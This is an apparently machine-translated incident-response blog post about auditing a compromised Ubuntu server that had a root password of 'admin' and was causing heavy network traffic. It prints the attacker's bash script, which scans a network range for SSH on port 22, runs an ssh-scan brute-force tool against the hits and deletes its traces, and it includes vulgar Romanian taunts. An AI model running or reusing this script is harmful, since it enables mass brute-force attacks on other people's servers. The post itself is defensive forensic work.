Select site language:
Audit ubuntu PDF Print E-mail
A few days ago came to us a company that had a problem with one of the servers. The server is running ubuntu and applications that run with the Oracle database version 10 The server caused a very high utilization of the link, despite the fact that should not generate virtually no traffic.

After several hours of analysis was the fact that a clear break.

It remains to find out how the attacker got into the system and what has changed.

The first stage was not too difficult, the person installing the system gave us the root password: admin. Password is not required unless a comment.

The second step is to find changes in the system and to assess opportunities to work without reinstalling.

To search for changes, we used tools like Rootkit Hunter, tripwire, etc.

The attacker has installed a simple applet that "attack" on:

#!/bin/bash
if [ $# != 1 ]; then
        echo " Folosesc: $0 clasa"
        exit;
fi

echo "<@Clasic> Its back ;-)"
./pscan2 $1 22

sleep 10
cat $1.pscan.22 |sort |uniq > mfu.txt
oopsnr2=`grep -c . mfu.txt`
echo "<@Clasic> Am gasit $oopsnr2 servere"
echo "------------------------"
echo "-=-      Clasic      -=-"
./ssh-scan 100
rm -rf $1.pscan.22 mfu.txt
echo "<@Clasic> Ia Zi Place Nu?!? PaiCum Pula MEa ;-)"

 

This we found very quickly, link utilization decreased.

But if the system was safe? It turned out that they do not, the analysis of system files showed a very large number of changes. We thought the system is too heavily infected to be able to give customers a 100% guarantee. We decided to re-install
the system..